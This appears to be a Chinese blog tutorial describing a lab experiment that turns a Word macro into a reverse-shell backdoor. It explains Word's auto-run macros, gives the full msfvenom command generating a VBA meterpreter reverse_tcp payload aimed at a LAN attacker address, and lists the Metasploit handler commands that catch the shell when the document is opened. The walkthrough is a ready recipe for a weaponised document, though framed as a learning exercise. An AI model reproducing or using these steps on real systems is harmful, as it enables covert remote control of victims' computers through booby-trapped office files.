office宏病毒反弹shell实验

0x00 什么是宏病毒

宏病毒就是Word中被嵌入的带有恶意行为的宏代码(VBA代码),当打开带有宏病毒的word文档时,嵌入其中的宏代码会自动运行
Word 将下列名称识别为自动宏,或称“auto”宏,当相应动作被执行,会自动调用满足条件的VBA代码。

AutoExec:启动 Word 或加载全局模板时
    AutoNew:每次新建文档时
    AutoOpen:每次打开已有文档时
    AutoClose:每次关闭文档时

0x01 简单实验环境搭建

本次实验的环境为:

win_10
word_2013
VM_kali_linux_2018(桥接模式)

首先在电脑中word信任中心设置中,打开启动所有宏选项,并信任对VBA工程对象模型的访问,以便更好的查看实验效果。

宏设置


在开发者工具中选中宏,编辑宏名称和宏位置后点击创建,进入VBA代码编辑界面。

宏创建
代码编辑界面

0x02实验开始

准备工作完成后,在kali中使用msfvenom生成一个vba类型的后门msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.169 LPORT=6666 -f vba -o test.vba

生成后门文件


将vba文件中的代码复制入刚刚的代码编辑界面,并保存。
查看windows主机的ip地址

ipconfig

在msf中设置本机监听:

use exploit/multi/handler #选泽监听模块
set payload windows/meterpreter/reverse_tcp  #选择生成木马相同的类型
set LHOST 192.168.1.169  #设置本机ip监听
set LPORT 6666  # 设置本机监听端口
exploit  #执行监听

当windows中打开我们生成的test.docx时,msf中接收到了来自192.168.1.249的连接。

获取shell
  • 2
    点赞
  • 16
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

星辰照耀你我

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值